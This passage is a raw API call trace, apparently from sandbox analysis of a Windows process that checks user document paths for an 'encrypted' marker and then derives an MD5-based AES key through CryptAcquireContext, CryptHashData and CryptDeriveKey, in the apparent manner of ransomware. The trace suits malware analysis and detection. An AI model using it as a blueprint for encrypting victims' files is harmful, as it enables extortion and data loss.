lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yj2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lqSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qSAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SAK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AK_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ho8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o8rx.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.055] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.055] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.055] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.055] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.055] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.055] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.055] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.055] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.055] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8168a0, ftCreationTime.dwHighDateTime=0x1d5bd8c, ftLastAccessTime.dwLowDateTime=0xdad62e60, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0xdad62e60, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x14cd6, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="8Yj2_lqSAK_Ho8rx.odp", cAlternateFileName="8YJ2_L~1.ODP")) returned 0x7c2240 [0036.055] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.055] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.056] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.056] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.056] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.056] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.056] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.056] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.056] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.056] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.056] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0036.057] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.057] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.057] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.057] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.057] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.057] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.057] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.057] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.058] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.058] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.058] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.058] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.058] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.058] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.058] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.059] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.059] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.059] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.059] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.059] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.059] CryptHashData (hHash=0x7c2100, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.059] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.060] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.060] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.060] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.060] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 